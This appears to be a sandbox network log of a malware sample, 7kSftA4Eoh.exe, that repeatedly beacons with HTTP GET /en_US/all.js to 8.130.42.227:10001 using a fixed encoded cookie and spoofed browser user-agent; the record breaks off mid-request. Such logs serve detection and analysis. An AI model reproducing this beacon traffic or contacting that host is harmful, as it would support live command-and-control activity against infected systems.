                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                123192.168.2.4498608.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:23.878797054 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:24.837048054 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:24 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                124192.168.2.4498618.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:24.952651024 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:25.934140921 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:25 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                125192.168.2.4498628.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:26.094698906 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:27.087327003 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:26 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                126192.168.2.4498638.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:27.202214956 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:28.172127962 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:27 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                127192.168.2.4498648.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:28.300782919 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:29.264139891 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:29 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                128192.168.2.4498658.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:29.374037027 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:30.313374043 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:30 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                129192.168.2.4498668.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:30.438182116 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:31.392505884 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:31 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                130192.168.2.4498678.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:31.515368938 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:32.462285042 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:32 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                131192.168.2.4498688.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:32.580897093 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:33.550673008 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:33 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                132192.168.2.4498698.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:33.674436092 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:34.629899979 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:34 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                133192.168.2.4498708.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:34.748933077 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:35.695903063 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:35 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                134192.168.2.4498718.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:35.925762892 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:36.920609951 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:36 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                135192.168.2.4498728.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:37.045258999 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:38.425457954 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:37 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0
                                                                Oct 1, 2024 09:19:38.425618887 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:37 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                136192.168.2.4498738.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:38.556296110 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:39.518117905 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:39 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                137192.168.2.4498748.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:39.638994932 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:40.587492943 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:40 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                138192.168.2.4498758.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:40.708197117 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:42.136219025 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:41 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0
                                                                Oct 1, 2024 09:19:42.136311054 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:41 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                139192.168.2.4498768.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:42.250993967 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:43.230906010 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:43 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                140192.168.2.4498778.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:43.342744112 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:44.303792000 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:44 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                141192.168.2.4498788.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:44.424791098 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:45.387233973 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:45 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                142192.168.2.4498798.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:45.516238928 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:46.466949940 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:46 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                143192.168.2.4498808.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:46.580837965 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:47.532047033 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:47 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                144192.168.2.4498818.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:47.654915094 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:48.613179922 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:48 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                145192.168.2.4498828.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:48.732733011 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:49.687880039 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:49 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                146192.168.2.4498838.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:49.816788912 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:50.784029961 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:50 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                147192.168.2.4498848.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:50.960016012 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:51.912849903 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:51 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                148192.168.2.4498858.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:52.029941082 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:52.973845005 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:52 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                149192.168.2.4498868.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:53.367117882 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
